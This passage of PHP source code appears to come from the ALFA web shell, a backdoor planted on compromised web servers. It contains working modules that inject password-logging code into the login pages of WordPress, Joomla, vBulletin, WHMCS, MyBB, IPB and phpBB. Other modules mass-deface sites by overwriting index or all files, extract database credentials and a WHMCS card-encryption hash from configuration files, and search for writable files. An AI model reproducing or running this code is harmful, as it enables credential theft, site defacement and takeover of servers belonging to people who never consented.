<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
$code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
$newfunc = create_function('$source,$destination', $code);
if($newfunc($dirzip, $zipfile)){
echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
}else{
alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
}}
echo '</div>';
alfafooter();
}
function alfacmshijacker(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo '<div class=header><br>
<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
echo("</select>");
echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
<input type="submit" name="btn" value=" "></form></center><br>';
$cms = $_POST['alfa1'];
$saveto = $_POST['alfa2'];
$cmspath = $_POST['alfa4'];
if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
echo __pre();
alfaHijackCms($cms,$cmspath,$saveto);
}
echo '</div>';
alfafooter();
}
function alfaHijackCms($cms,$cmspath,$saveto){
switch($cms){
case "vb":
hijackvBulletin($cmspath,$saveto);
break;
case "wp":
hijackwp($cmspath,$saveto);
break;
case "jom":
hijackJoomla($cmspath,$saveto);
break;
case "whmcs":
hijackWhmcs($cmspath,$saveto);
break;
case "mybb":
hijackMybb($cmspath,$saveto);
break;
case "ipb":
hijackIPB($cmspath,$saveto);
break;
case "phpbb":
hijackPHPBB($cmspath,$saveto);
break;
default:
echo "error!";
break;
}
}
function hijackvBulletin($path,$saveto){
$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
$code=str_replace('{saveto_path}',$saveto,$code);
$login = $path."/login.php";
$class = $path."/includes/class_bootstrap.php";
$dologin = 'do_login_redirect();';
$evil_login = "\t".$code."\n\t".$dologin;
$evil_class = "true";
if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
$data_login = @file_get_contents($login);
$data_class = @file_get_contents($class);
if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
$login_replace = str_replace($dologin,$evil_login, $data_login);
$class_replace = str_replace($clearpw,$evil_class, $data_class);
@file_put_contents($login, $login_replace);
@file_put_contents($class, $class_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackwp($path,$saveto){
$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/wp-login.php";
$evil_login = "\t".$redirect_wp."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $redirect_wp)){
$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackJoomla($path,$saveto){
$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$comp=$path."/administrator/components/com_login/";
if(@is_file($comp."/login.php")){
$login = $comp."/login.php";
}elseif(@is_file($comp."/admin.login.php")){
$login = $comp."/admin.login.php";
}else{
$login = '';
}
if(@is_file($login) AND @is_writable($login) AND $login != ''){
$data_login = @file_get_contents($login);
$evil_login = $code."\n".$data_login;
@file_put_contents($login, $evil_login);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackWhmcs($path,$saveto){
$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$conf=$path."/configuration.php";
if(@is_file($conf) AND @is_writable($conf)){
$data_conf = @file_get_contents($conf);
if(!strstr($data_conf,'?>'))$code = '?>'.$code;
$evil_conf = $data_conf."\n".$code;
@file_put_contents($conf, $evil_conf);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackMybb($path,$saveto){
$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
$find = '$loginhandler->complete_login();';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/member.php";
$evil_login = "\t".$code."\n\t".$find;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackIPB($path,$saveto){
$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$find = 'unset( $member[\'plainPassword\'] );';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/admin/sources/handlers/han_login.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackPHPBB($path,$saveto){
$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$find = 'case \'login\':';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/ucp.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
if(@is_dir($dir)){
$files=@scandir($dir);
foreach($files as $key => $value){
$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
if(!@is_dir($path)){
if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
if($e=='str'){
$content = @file_get_contents($path);
if(strpos($content, $string) !== false){
echo str_replace('\\','/',$path) . "<br>";
}
}else{
if(strstr($value,$string)){
echo str_replace('\\','/',$path) . "<br>";
}
}
$results[] = $path;
}elseif($value != "." && $value != "..") {
Alfa_StrSearcher($path,$string,$ext,$e,$results);
$results[] = $path;
}}}}
function alfasearcher(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
$method = $_POST['alfa4'];
if($_POST['alfa5']=='>>'){
echo __pre();
if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
Alfa_Searcher($dir,trim($ext),$method);
}
}
if($_POST['alfa1']=='str'){
echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$string = $_POST['alfa3'];
$ext = $_POST['alfa5'];
if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
echo __pre();
Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
}
}
echo '</div>';
alfafooter();
}
function alfaMassDefacer(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
	Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
	DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
$dir = $_POST['alfa1'];
$defpage = $_POST['alfa2'];
$method = $_POST['alfa3'];
$fCurrent = $GLOBALS['__file_path'];
if($_POST['alfa4'] == '>>'){
if(!empty($dir)){
if(@is_dir($dir)){
if(@is_readable($dir)){
if(@is_file($defpage)){
if($dh = @opendir($dir)){
echo __pre();
while (($file = @readdir($dh)) !== false){
if($file == '..' || $file == '.')continue;
$newfile=$dir.$file;
if($fCurrent == $newfile)continue;
if(@is_dir($newfile)){
Alfa_ReadDir($newfile,$method,$defpage);
}else{
if(!@is_writable($newfile))continue;
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}else{__alert('<font color="red">Error In OpenDir...</font>');}
}else{__alert('<font color="red">DefPage File NotFound...</font>');}
}else{__alert('<font color="red">Directory is not Readable...</font>');}
}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
}else{__alert('<font color="red">Dir is Empty...</font>');}
}
echo '</div>';
alfafooter();
}
function Alfa_ReadDir($dir,$method='',$defpage=''){
if(!@is_readable($dir)) return false;
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while(($file=readdir($dh))!==false) {
if($file == '..' || $file == '.')continue;
$newfile=$dir.'/'.$file;
if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
if(@is_file($newfile)){
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
if(!@is_writable($dir)) return false;
if(!@is_readable($dir)) return false;
$defpage=@file_get_contents($defpage);
if($m == 'index'){
$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
if(in_array(strtolower($file),$indexs)){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
}
}elseif($m=='all'){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."  <b><font color='red'>DeFaced...</b></font><br>" : '';
}
}
function alfaGetDisFunc(){
alfahead();
echo '<div class="header">';
$disfun = @ini_get('disable_functions');
$s = explode(',',$disfun);
$f = array_unique($s);
echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
$i=1;
foreach($f as $s){
$s=trim($s);
if(function_exists($s)||!is_callable($s))continue;
echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
$i++;
}
echo '</table></center>';
echo '</div>';
alfafooter();
}
function Alfa_Create_A_Tag($action,$vals){
$nulls = array();
foreach($vals as $key => $val){
echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
$f = implode(',',$nulls);
echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
unset($nulls);
}
}
function Alfa_Searcher($dir, $ext, $method) {
if(@is_readable($dir)){
if($method == 'all')$ext = '*';
if($method == 'dirs')$ext = '*';
$globFiles = @glob("$dir/*.$ext");
$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)) continue;
@Alfa_Searcher($dir, $ext, $method);
}
switch($method){
case "files":
foreach ($globFiles as $file){
if(@is_writable($file)){
echo "$file<br>";
}
}
break;
case "dirs":
foreach ($globFiles as $file){
if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
echo dirname($file).'<br>';
$blacklist[] = dirname($file);
}
}
break;
case "all":
foreach ($globFiles as $file){
echo $file.'<br>';
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f,$width='100%',$height='600px'){
return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
}
class AlfaCURL {
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = false;
public $curl_status = true;
function __construct($cookies=false,$compression='gzip',$proxy=''){
if(!extension_loaded('curl')){$curl_status = false;return false;}
$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if($this->cookies)$this->cookie($this->path);
}
function cookie($cookie_file) {
if (_alfa_file_exists($cookie_file,false)) {
$this->cookie_file=$cookie_file;
}else{
@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
$this->cookie_file=$cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url,$method="get",$data=""){
if(!$this->curl_status){return false;}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if($this->ssl){
curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
}
if($this->cookies){
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if($this->proxy){
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if($method=='post'){
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$return = curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
die;
}
}
function getConfigHtml($cms){
$content = '';
$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
$content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
foreach($cms_array as $key => $val){
$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
}
$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
$content .= "</form>";
return $content;
}
function alfaGetConfig(){
$cms = $_POST['alfa1'];
$path = trim($_POST['alfa2']);
$config = array(
'wp'=>array('file'=>'/wp-config.php',
'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'drupal'=>array('file'=>'/config.php',
'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
),
'vb'=>array('file'=>'/includes/config.php',
'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'phpnuke'=>array('file'=>'/config.php',
'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
),
'smf'=>array('file'=>'/Settings.php',
'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'whmcs'=>array('file'=>'/configuration.php',
'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'joomla'=>array('file'=>'/configuration.php',
'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'phpbb'=>array('file'=>'/config.php',
'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'mybb'=>array('file'=>'/inc/config.php',
'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
)
);
$data = array();
$srch_host = $config[$cms]['host'][0];
$srch_user = $config[$cms]['dbuser'][0];
$srch_name = $config[$cms]['dbname'][0];
$srch_pw = $config[$cms]['dbpw'][0];
$prefix = $config[$cms]['prefix'][0];
$file = $config[$cms]['file'];
$chost = $config[$cms]['host'][1];
$cuser = $config[$cms]['dbuser'][1];
$cname = $config[$cms]['dbname'][1];
$cpw = $config[$cms]['dbpw'][1];
$cprefix = $config[$cms]['prefix'][1];
if(@is_dir($path)||_alfa_is_dir($path)){
$file=$path.$file;
}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
$file=$path;
}else{
return false;
}
$file = __read_file($file);
if(preg_match($srch_host, $file, $mach)){
$data['host'] = $mach[$chost];
}
if(preg_match($srch_user, $file, $mach)){
$data['user'] = $mach[$cuser];
}
if(preg_match($srch_name, $file, $mach)){
$data['dbname'] = $mach[$cname];
}
if(preg_match($srch_pw, $file, $mach)){
$data['password'] = $mach[$cpw];
}
if(isset($prefix)){
if(preg_match($prefix, $file, $mach)){
$data['prefix'] = $mach[$cprefix];
}
}
if($cms=='whmcs'){
if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
$data['cc_encryption_hash'] = $mach[3];
}
}
echo json_encode($data);
}
if(empty($_POST['a']))
if(isset($default_action) && function_exists('alfa' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'FilesMan';
if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
call_user_func('alfa' . $_POST['a']);
exit;
/*
#Persian Gulf For Ever
#skype : sole.sad
#skype : ehsan.invisible
*/